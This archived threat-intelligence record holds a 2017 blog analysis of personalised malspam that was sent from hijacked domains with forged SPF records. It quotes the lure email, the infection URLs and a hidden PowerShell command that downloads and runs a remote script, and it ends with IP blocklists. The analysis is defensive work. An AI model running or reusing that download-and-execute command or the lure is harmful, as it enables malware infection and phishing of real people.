{
	"id": "6e726ec8-4fe5-4bbb-b0d2-9dfec08daa34",
	"created_at": "2026-04-06T00:07:31.186045Z",
	"updated_at": "2026-04-10T03:21:33.554307Z",
	"deleted_at": null,
	"sha1_hash": "63b0ad6255d650ac545240d3f3650eb5c4e713cf",
	"title": "Highly personalised malspam making extensive use of hijacked domains",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 68386,
	"plain_text": "Highly personalised malspam making extensive use of hijacked\r\ndomains\r\nArchived: 2026-04-05 21:22:26 UTC\r\nThis spam email contained not only the intended victim's name, but also their home address and an apparently\r\nvalid mobile telephone number:\r\nSent: 14 February 2017 13:52\r\nTo: [redacted]\r\nFrom: \u003ccustomer@localpoolrepair.com\u003e\r\nSubject: Mr [Redacted] Your order G29804772-064 confirmation\r\nDear Mr [redacted],\r\nThank you for placing an order with us.\r\nFor your reference your order number is G29804772-064.\r\nPlease note this is an automated email. Please do not reply to this email.\r\nGet your order G29804772-064 details\r\nYour order has been placed and items in stock will be sent to the address shown below. Please check all\r\nthe details of the order to ensure they are correct as we will be unable to make changes once the order\r\nhas been processed. You will have been notified at the point of order if an item is out of stock already\r\nwith expected delivery date.\r\nDelivery Address\r\n[address redacted]\r\n[telephone number redacted]\r\nDelivery Method:\r\nStandard Delivery\r\nhttps://blog.dynamoo.com/2017/02/highly-personalised-malspam-making.html\r\nPage 1 of 4\n\nYour Order Information\r\nPrices include VAT at 20%\r\nCustomer Service Feedback\r\nWe are always working to improve the products and service we provide to our customers - we do this\r\nthrough a continual review of the product range, and ongoing training of our Customer Service Team.\r\nWe continually strive to improve our levels of service and we welcome feedback from our customers\r\nregarding your buying experience and the product you receive.\r\nFeefo Independent Reviews\r\n21 days after your purchase, you will receive an email from the independent feedback company Feefo.\r\nIt takes less than a minute to complete and we'd really appreciate your feedback!\r\nIMPORTANT INFORMATION ABOUT YOUR ORDER\r\nDelivery\r\nOrder Tracking\r\nOnce your order has left our warehouse we will email you to confirm that the items have been shipped\r\nand include tracking details of the parcel so that you may track delivery progress directly with our\r\ncourier company.\r\nStock Availability\r\nOn very rare occasions not every item will be available when we come to pack and despatch your order.\r\nIf this is the case you will receive an email from us letting you know which items are affected and an\r\nexpected delivery time.\r\nProduct Returns\r\nAll items purchased are covered by our customer friendly returns policy. Please visit for full details.\r\nThank you for placing your order with us. We really appreciate your custom and will do everything\r\nwithin our power to ensure you get the very best of service.\r\nThe data in the spam was identifiable as being a few years old. The intended victim does not appear on the\r\nhaveibeenpwned.com database. My assumption is that this information has been harvested from an undisclosed\r\ndata breach.\r\nI was not able to extract the final payload, however the infection path is as follows:\r\nhttp://bebracelet.com/customerarea/notification-processing-G29804772-064.doc\r\n--\u003e http://customer.abudusolicitors.com/customerarea/notification-processing-G29804772-064.doc\r\n--\u003e https://customer.affiliate-labs.net/customerarea/notification-processing-G29804772-064.zip\r\nThis ZIP file actually contains a .lnk file with the following Powershell command embedded in it:\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden -nop -ep bypass -nologo -c\r\nIEX ((New-Object Net.WebClient).DownloadString('http://cristianinho.com/lenty/reasy.ps1'));\r\nhttps://blog.dynamoo.com/2017/02/highly-personalised-malspam-making.html\r\nPage 2 of 4\n\nI couldn't get a response from the server at cristianinho.com [5.152.199.228 - Redstation, UK], this looks like a\r\npossibly legitimate but hijacked domain that uses nameservers belonging to Namecheap. But that's not the only\r\nNamecheap connection, because the two \"customer\" subdomains are also using Namecheap hosting (for the\r\nrecord the subdomains are hosted on - 185.130.207.37 and 185.141.165.204 which is Host1Plus, UK / Digital\r\nEnergy Technologies, DE).\r\nThree connection to Namecheap is worrying, and certainly we've seen hijacking patterns involving other domain\r\nregistrars. Or it could just be a coincidence..\r\nThe email originated from mx119.argozelo.info on 188.214.88.119 (Hzone, Romania). Just on a hunch, I checked\r\nthe domain argozelo.info and it appears to be a wholly legitimate site about a Portuguese village, registered at\r\nGoDaddy hosted on Blogger. So why does it need a dedicated mail server?\r\nWell.. this particular rabbit hole goes a little deeper. mx119 gives a clue that there might be more than one\r\nmailsever, and indeed there are 34 of the critters name mx110.argozelo.info through to mx143.argozelo.info\r\nhosted on 188.214.88.110 through 188.214.88.142. But according to Wikipedia, Argozelo only has about 700\r\ninhabitants, so it seems unlikely that they'd need 34 mailservers in Romania.\r\nSo, my guess is that argozelo.info has also been hijacked, and hostnames set up for each of the mailservers. But\r\nwe're not quite finished with this rabbit hole yet. Oh no.\r\nWhat caught my eye was a mailserver on 188.214.88.110 (the same as mx110.argozelo.info) named\r\nmail.localpoolrepair.com which certainly rang a bell because the email was apparently from\r\ncustomer@localpoolrepair.com - yeah, OK.. the \"From\" in an email can be anything but this can't be a\r\ncoincidence.\r\nlocalpoolrepair.com appears to be a legitimate but unused GoDaddy-registered domain, hosted at an Athenix\r\nfacility in the US. So why is there a mailserver in a Romanian IP block? A DIG at the records for this domain are\r\nrevealing:\r\n Query for localpoolrepair.com type=255 class=1\r\n  localpoolrepair.com SOA (Zone of Authority)\r\n        Primary NS: dns.site5.com\r\n        Responsible person: hostmaster@site5.com\r\n        serial:2017021207\r\n        refresh:3600s (60 minutes)\r\n        retry:3600s (60 minutes)\r\n        expire:604800s (7 days)\r\n        minimum-ttl:3600s (60 minutes)\r\n  localpoolrepair.com A (Address) 143.95.232.95\r\n  localpoolrepair.com MX (Mail Exchanger) Priority: 10 mail.localpoolrepair.com\r\n  localpoolrepair.com NS (Nameserver) dns2.site5.com\r\n  localpoolrepair.com NS (Nameserver) dns.site5.com\r\n  localpoolrepair.com TXT (Text Field)\r\nhttps://blog.dynamoo.com/2017/02/highly-personalised-malspam-making.html\r\nPage 3 of 4\n\nv=spf1 ip4:188.214.88.110/31 ip4:188.214.88.112/28 ip4:188.214.88.128/29 ip4:188.214.88.136/30\r\nip4:188.214.88.140/31 ip4:188.214.88.142/32  ~all\r\nSo.. the SPF records are valid for sending servers in the 188.214.88.110 through 188.214.88.142 range. It looks to\r\nme as if localpoolrepair.com has been hijacked and these SPF records added to it.\r\nSo we have hijacked legitimate domains with presumably a neutral or good reputation, and we have valid SPF\r\nrecords. This means that the spam will have decent deliverability. And then the spam itself addresses the victim by\r\nname and has personal details presumably stolen in a data breach. Could you trust yourself not to click the link?\r\nRecommended blocklist (email)\r\n188.214.88.0/24\r\nRecommended blocklist (web)\r\n5.152.199.228\r\n185.130.207.37\r\n185.141.165.204\r\nSource: https://blog.dynamoo.com/2017/02/highly-personalised-malspam-making.html\r\nhttps://blog.dynamoo.com/2017/02/highly-personalised-malspam-making.html\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://blog.dynamoo.com/2017/02/highly-personalised-malspam-making.html"
	],
	"report_names": [
		"highly-personalised-malspam-making.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434051,
	"ts_updated_at": 1775791293,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/63b0ad6255d650ac545240d3f3650eb5c4e713cf.pdf",
		"text": "https://archive.orkl.eu/63b0ad6255d650ac545240d3f3650eb5c4e713cf.txt",
		"img": "https://archive.orkl.eu/63b0ad6255d650ac545240d3f3650eb5c4e713cf.jpg"
	}
}